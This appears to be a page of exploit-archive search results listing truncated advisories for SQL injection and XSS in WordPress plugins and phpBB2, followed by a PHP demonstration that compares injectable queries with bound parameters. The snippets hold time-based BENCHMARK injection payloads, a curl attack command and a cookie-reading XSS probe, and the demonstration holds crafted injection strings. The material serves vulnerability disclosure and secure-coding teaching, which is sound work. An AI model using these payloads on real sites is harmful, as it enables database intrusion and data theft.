1375 matches found
WordPress Zotpress 4.4 SQL Injection
Exploit Title: WordPress Zotpress plugin ... IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23 --------------- Vulnerable code --------------- if ($mzrapiuserid == false && $mzrinclude == false && isset($_GET['apiuserid']) && preg_match("/^[0-9]+$/", $_GET['apiuserid'])) $mzrapiuserid = trim($_GET['apiuserid']);...
WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection
Exploit Title: WordPress Facebook Opengraph Meta Plugin plugin ... get_var("SELECT COUNT(*) AS count FROM $wpdb->postmeta WHERE meta_key = 'OgMeta'"); $count = $result['count']; if ($count > 0) $totalpages = ceil($count/$limit); else $totalpages = 0; if ($page > $totalpages) $page=$totalpages; $start = $limit*($page -...
WordPress VideoWhisper Video Presentation 1.1 SQL Injection
Exploit Title: WordPress VideoWhisper Video Presentation plugin ... IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 e.g.: curl --data "s=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/cstatus.php...
WordPress Plugin VideoWhisper Video Presentation 1.1 - SQL Injection
Exploit Title: WordPress VideoWhisper Video Presentation plugin ... IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 e.g.: curl --data "s=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/cstatus.php...
WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability
Exploit Title: WordPress SearchAutocomplete plugin ... get_results("SELECT post_title As name, ID as postid, guid AS url, 1 cnt FROM ".$wpdb->prefix."posts t WHERE post_status='publish' and (post_type='post' OR post_type='page') and post_date < NOW() and...
WordPress WP Audio Gallery Playlist 0.12 SQL Injection
Exploit Title: WordPress wp audio gallery playlist plugin ... prefix . "posts"; ... if (isset($_GET['postgallery'])) $query = 'SELECT * FROM '.$tablename.' WHERE post_parent = ''.$_GET['postgallery'].'' AND post_mime_type = 'audio/mpeg' ORDER BY menu_order ASC';...
WordPress Yolink Search 1.1.4 SQL Injection
Exploit Title: WordPress yolink Search plugin ... get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN ($posttypein) AND ID > $idfrom order by ID asc LIMIT $batchsize" ) ); //misusage of $wpdb->prepare :...
vAuthenticate 3.0.1 - Authentication Bypass
----------------------------------------------------------------------- vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability ----------------------------------------------------------------------- Author: bd0rk Contact: bd0rk[at]hackermail.com Date: 2011 / 08 / 30 MEZ-Time: 01:35...
WordPress Plugin Couponer 1.2 - SQL Injection
Exploit Title: WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability Date: 2011-08-31 Author: Miroslav Stampar miroslav.stampar[at]gmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/couponer.zip Version: 1.2 (tested) Note: magic_quotes has to be turned off --- PoC ---...
WordPress Plugin Advertizer 1.0 - SQL Injection
Exploit Title: WordPress Advertizer plugin ... IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- Vulnerable code --------------- $res = $wpdb->get_row("SELECT limitclicks, traceclicks FROM ".$wpdb->prefix."advvbase WHERE id = '".$_POST[id]."' limit 1;");...
WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability
Exploit Title: WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability Date: 2011-08-28 Author: Miroslav Stampar miroslav.stampar[at]gmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/evarisk.5.1.3.6.zip Version: 5.1.3.6 (tested) Note:...
PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting
^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability ^ Author : Silic0n sciencemedia017[At]yahoo.com ^ MOD Title: Custom mass PM ^ MOD Description: Add mass PM functionality to group members or all forums members for authorized users...
PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting
... alert(document.cookie) -------------------- ^ Vulnerable code -------------------- $tousernamearray = explode(...
WordPress Plugin DS FAQ 1.3.2 - SQL Injection
Exploit Title: WordPress WP DS FAQ plugin ... IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) --------------- Vulnerable code --------------- switch($_POST['action']) ... case 'deletefaqbook': if(!isset($_POST['id'])) error; $id = $_POST['id']; ... $sql = "DELETE FRO...
WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability
Exploit Title: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability Date: 2011-08-17 Author: Miroslav Stampar miroslav.stampar[at]gmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.zip Version:...
WordPress Contus HD FLV Player 1.3 SQL Injection
Exploit Title: WordPress Contus HD FLV Player plugin ... IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1 --------------- Vulnerable code --------------- $pid1 = $_GET['playid']; foreach ($_GET['listItem'] as $position => $item) : mysql_query("UPDATE $wpdb->prefix" . "hdflvmed2play SET sorder =...
WordPress Plugin Ajax Gallery 3.0 - SQL Injection
Exploit Title: WordPress Ajax Gallery plugin ... IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) --------------- Vulnerable code --------------- if (isset($_GET['delete']) && isset($_GET['gId'])) { $wpdb->query("DELETE FROM $wpdb->options WHERE option_name='agItem' and option_id=".$_GET['gId']); echo "Galeria...
WordPress Plugin Global Content Blocks 1.2 - SQL Injection
Exploit Title: WordPress Global Content Blocks plugin ... 0 // intval("1a") = 1 : $entry = $wpdb->get_row("select * from ".$wpdb->prefix."gcb where id=".$id); $finaltext = base64_encode($entry->name)."". base64_encode($entry->description)."". base64_encode($entry->value)."". base64_encode($entry->type);...
WordPress Plugin IP-Logger 3.0 - SQL Injection
Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stampar[at]gmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 (tested) ---...
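The fault the listing repeats (Advertizer, DS FAQ, Ajax Gallery, Audio Gallery Playlist: a request parameter concatenated into the SQL text) and the $wpdb->prepare misuse noted for Yolink Search (the variable is interpolated into the format string, so prepare() has nothing left to parameterise), shown beside the bound-parameter form. This is an added example, not code from any advisory above or from the plugins themselves: PDO with an in-memory SQLite table stands in for $wpdb so it runs outside WordPress, the wp_posts rows and the two payloads are constructed here, and it assumes PHP 7.4 or later with the pdo_sqlite extension.

```php
<?php
// Added example, not taken from any advisory on this page or from the plugins listed.
// PDO + in-memory SQLite stands in for $wpdb; the table, rows and payloads are constructed.
declare(strict_types=1);

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_status TEXT)");
    $db->exec("INSERT INTO wp_posts VALUES (1, 'Hello world', 'publish'), (2, 'Unpublished draft', 'private')");
    return $db;
}

// The listing's pattern: the request value is glued straight into the SQL string.
// The query is meant to return only published rows matching one ID.
function vulnerable_lookup(PDO $db, string $id): array {
    $sql = "SELECT post_title FROM wp_posts WHERE post_status='publish' AND ID = '" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// The Yolink Search mistake: prepare() is called, but the untrusted value was
// interpolated into the SQL text first, so the statement carries no parameters.
function prepare_misuse(PDO $db, string $idfrom): array {
    $stmt = $db->prepare("SELECT post_title FROM wp_posts WHERE post_status='publish' AND ID > $idfrom ORDER BY ID ASC");
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the value travels as a bound parameter, never as SQL text.
// The WordPress equivalent is $wpdb->prepare("... AND ID > %d", $idfrom).
function safe_lookup(PDO $db, string $idfrom): array {
    $stmt = $db->prepare("SELECT post_title FROM wp_posts WHERE post_status='publish' AND ID > ? ORDER BY ID ASC");
    $stmt->execute([$idfrom]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = make_db();
$quoted_payload  = "1' OR post_status='private' -- ";   // closes the string literal, widens the WHERE
$numeric_payload = "0 OR post_status='private'";        // no quote needed in a numeric comparison

print_r(vulnerable_lookup($db, $quoted_payload));   // the quote is closed and the private row is pulled in
print_r(prepare_misuse($db, $numeric_payload));     // same effect: prepare() never saw a placeholder
print_r(safe_lookup($db, $numeric_payload));        // the whole payload is compared as a single value
```

Run it with `php` on the command line. The first two calls return the private row alongside the published one; the third returns nothing, because the bound value is compared as one opaque string rather than parsed as SQL. The BENCHMARK payloads in the advisories above exploit exactly the first two shapes, only with a timing side channel instead of a visible extra row.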